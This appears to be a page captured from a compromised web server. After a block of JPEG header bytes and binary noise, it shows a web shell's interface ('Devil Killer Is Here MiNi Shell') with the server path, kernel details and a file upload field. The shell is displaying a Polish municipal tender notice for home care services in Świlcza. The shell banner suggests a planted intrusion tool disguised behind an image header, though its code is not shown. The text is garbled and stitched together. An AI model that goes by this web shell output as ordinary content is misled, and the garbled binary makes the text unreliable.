JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240125/0006847701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi i usług opiekuńczych dla<br/>podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINNY OŚRODEK POMOCY SPOŁECZNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690010308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">168</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-072</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gops.swilcza@intertele.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gops.swilcza.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi i usług opiekuńczych dla<br/>podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e15748f9-bb6c-11ee-9897-f6855eb846c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00068477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_swilcza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert (w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125<br/>ust. 1 ustawy, inne dokumenty składające się<br/>na ofertę, o których mowa w SWZ i ustawie): Ofertę należy złożyć w sposób przewidziany w sekcji<br/>III.3.6. ogłoszenia. Ofertę wraz z załącznikami należy przesyłać drogą elektroniczną za pośrednictwem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza (patrz: sekcja VIII.8.2 ogłoszenia) 2. Sposób<br/>komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert): 1) w postępowaniu o<br/>udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień, podmiotowych środków dowodowych oraz<br/>przekazywanie informacji (innych niż wskazanych w ust. 1) odbywa się elektronicznie za pośrednictwem poczty elektronicznej<br/>(email):<br/>gops.swilcza@intertele.pl; lub poprzez Platformę,<br/>dostępną pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferty<br/>(w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty<br/>składające się na ofertę, o których mowa w SWZ i ustawie):1) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować (zalogować) się na Platformie<br/>i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod<br/>adresem: https://platformazakupowa.pl/pn/gmina_swilcza; 2) Zamawiający informuje, że instrukcje<br/>korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie<br/>treści SWZ, składania ofert, wielkości przesyłanych plików, odbierania dokumentów elektronicznych,<br/>zmiana lub wycofanie oferty oraz innych czynności podejmowanych w niniejszym postępowaniu przy<br/>użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje3) ofertę sporządza się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;4) w celu złożenia oferty należy<br/>zarejestrować (zalogować) się na Platformie i postępować zgodnie z instrukcjami dostępnymi u<br/>dostawcy rozwiązania informatycznego pod adresem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view5) jeżeli dokumenty<br/>elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z<br/>jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”;6) do oferty<br/>należy dołączyć dokumenty wymagane w ustawie oraz w SWZ, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum<br/>(ZIP);7) oferta może być złożona tylko do upływu terminu składania ofert;8) Wykonawca po upływie<br/>terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty;9) dane<br/>postępowanie można wyszukać na Liście wszystkich postępowań pod adresem:<br/>https://platformazakupowa.pl ze strony głównej z zakładki Postępowania lub pod adresem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza klikając opcję Postępowania.2. Sposób komunikowania<br/>się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)1) w postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz przekazywanie<br/>informacji (innych niż wskazanych w ust. 1) odbywa się elektronicznie za pośrednictwem poczty<br/>elektronicznej (e-mail) lub poprzez Platformę, dostępną pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza2) we wszelkiej<br/>korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub numerem<br/>referencyjnym nadanym przez zamawiającego;3) adres poczty elektronicznej do komunikacji<br/>Wykonawców z Zamawiającym (e-mail): gops.swilcza@intertele.pl; 4) za datę przekazania<br/>oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz informacji (innych niż wskazanych<br/>w ust. 1) przyjmuje się datę ich przekazania na platformie -<br/>https://platformazakupowa.pl/pn/gmina_swilcza lub wpłynięcia na ww. adres poczty elektronicznej;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1, z późn. zm.), dalej „RODO”, informuję, że: - administratorem Pani/Pana<br/>danych osobowych jest Gminny Ośrodek Pomocy Społecznej w Świlczy, 36-072 Świlcza168, tel. (17)<br/>85 60 338, fax (17) 85 60 338, e-mail: gops.swilcza@intertele.pl;- inspektorem ochrony danych<br/>osobowych u Zamawiającego jak wyżej jest Pan Daniel Panek, kontakt z Inspektorem Ochrony Danych<br/>– biuro@mpls.com.pl;-Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: 1) Świadczenie specjalistycznych usług<br/>opiekuńczych dla osób z zaburzeniami psychicznymi z terenu Gminy Świlcza w 2024 r.,<br/>2) Świadczenie usług opiekuńczych dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy w 2024 r., numer<br/>referencyjny: GOPS.26.3.2024, prowadzonym w trybie<br/>podstawowym;-odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dn.<br/>11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.), dalej „ustawa Pzp”;- Pani/Pana<br/>dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;- obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp;- w odniesieniu<br/>do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22RODO;- posiada Pani/Pan:– na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących*;– na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych** ;– na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO***;– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;- nie przysługuje Pani/Panu:– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;– prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;- w<br/>przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z<br/>uprawnienia,o którym mowa w art. 15 ust. 1–3 RODO, zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia;- Zamawiający udostępnia dane<br/>osobowe, o których mowa wart. 10 RODO, w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy, do upływu terminu na ich wniesienie;- przysługuje<br/>Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie<br/>Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest<br/>Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz: sekcja III 3.15 ogłoszenia: * Wyjaśnienie:<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1– 3 RODO,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane<br/>dotyczą,<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lubdaty postępowania o udzielenie zamówienia publicznego; ** Wyjaśnienie: Skorzystanie przez<br/>osobę,której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa<br/>w art.16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z<br/>ustawą.Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może<br/>naruszać<br/>integralności protokołu postępowania oraz jego załączników; *** Wyjaśnienie: Prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania<br/>ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. W postępowaniu<br/>o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.<br/>1RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOPS.26.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi z terenu Gminy Świlcza<br/>w 2024 r.<br/>1. Przedmiotem zamówienia w ramach części nr 1 jest świadczenie specjalistycznych usług opiekuńczych dla osób z<br/>zaburzeniami psychicznymi dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy w miejscu zamieszkania<br/>tych osób w dni robocze z wyłączeniem dni ustawowo wolnych i świąt.<br/>2. Przez specjalistyczne usługi opiekuńcze rozumie się usługi określone w rozporządzeniu Ministra Polityki Społecznej z<br/>dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. Nr. 189, poz. 1598 z późn. zmianami), tj.<br/>usługi opiekuńcze świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym, dostosowane do<br/>szczególnych potrzeb osób wymagających pomocy w tej formie, wynikające z rodzaju ich schorzenia, w tym specjalistyczne<br/>usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>3. Wykonawca świadczyć będzie usługi na podstawie indywidualnych decyzji wydanych przez<br/>Gminny Ośrodek Pomocy Społecznej w Świlczy a także dokumentacji medycznej przekazanej<br/>Wykonawcy po podpisaniu umowy.<br/>4. Szacunkowa liczba klientów, dla których świadczone będą specjalistyczne usługi opiekuńcze przez okres do 11 miesięcy tj. nie wcześniej niż od podpisania umowy i nie później niż do 31 grudnia 2024 r. wynosi 15 osób. Natomiast szacunkowa liczba przewidzianych do zrealizowania godzin wynosi 4 396.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiar zatrudnienia osoby</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Świadczenie usług opiekuńczych dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy w 2024<br/>r.:<br/>1. Przedmiotem zamówienia w ramach części nr 2 jest świadczenie usług opiekuńczych dla podopiecznych Gminnego<br/>Ośrodka Pomocy Społecznej w Świlczy w 2024 r.<br/>2.	Szacunkowa liczba klientów, dla których świadczone będą codziennie w dni robocze usługi opiekuńcze przez okres do 11 miesięcy tj. nie wcześniej niż od podpisania umowy i nie później niż do 31 grudnia 2024 r. wynosi 3. Szacunkowa liczba przewidzianych do zrealizowania godzin w okresie związania umową wynosi łącznie 1 506 godzin.<br/>3. Liczba godzin usług i osób dla których będą świadczone usługi opiekuńcze może ulec zmianie w czasie wykonywania<br/>przedmiotu zamówienia ze względu na specyfikę usługi, którą cechuje zmienność potrzeb podopiecznych z uwagi na<br/>zmieniający się stan zdrowia.<br/>4. Zamawiający zastrzega sobie prawo dokonania zmian w zakresie usług, będących przedmiotem niniejszej umowy, jeżeli<br/>będzie to konieczne ze względu na zmiany w obowiązujących przepisach prawa.<br/>5. Zakres usługi obejmuje świadczenie usług opiekuńczych na rzecz osób niesamodzielnych w zakresie:<br/>– pomoc w zaspokojeniu codziennych potrzeb życiowych podopiecznego: robienie niezbędnych zakupów, podanie oraz<br/>pomoc podopiecznemu przy spożywaniu posiłków i napojów posiłku lub jego dostarczenie z punktu wydawania posiłku,<br/>bieżące prace porządkowe w mieszkaniu podopiecznego lub części mieszkania użytkowanej przez podopiecznego, mycie<br/>naczyń, pranie ubrań i bielizny podopiecznego,<br/>– opiekę higieniczną: pomoc w utrzymywaniu higieny osobistej podopiecznego (mycie), zmiana bielizny osobistej i<br/>pościelowej, ubranie chorego,<br/>– pielęgnację podopiecznego: pomoc przy załatwianiu potrzeb fizjologicznych, zapobieganie w powstawaniu odleżyn,<br/>pomoc w ułożeniu chorego w łóżku, zmianie pozycji chorego w łóżku, pomoc w poruszaniu się chorego po mieszkaniu,<br/>zamawianie wizyt lekarza, pielęgniarki,<br/>– zapewnienie w miarę możliwości kontaktu z otoczeniem: zamawianie wizyt duchownych u podopiecznego, wysyłanie<br/>korespondencji, załatwienie drobnych spraw urzędowych, wyjście z podopiecznym na spacer, dostarczenie prasy i książek.<br/>Wymienione wyżej czynności mogą być wykonywane w zależności od potrzeb chorego. Ilość godzin przyznawanych usług<br/>opiekuńczych jest zależna od potrzeb podopiecznego oraz możliwości Gminnego Ośrodka Pomocy Społecznej w Świlczy.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 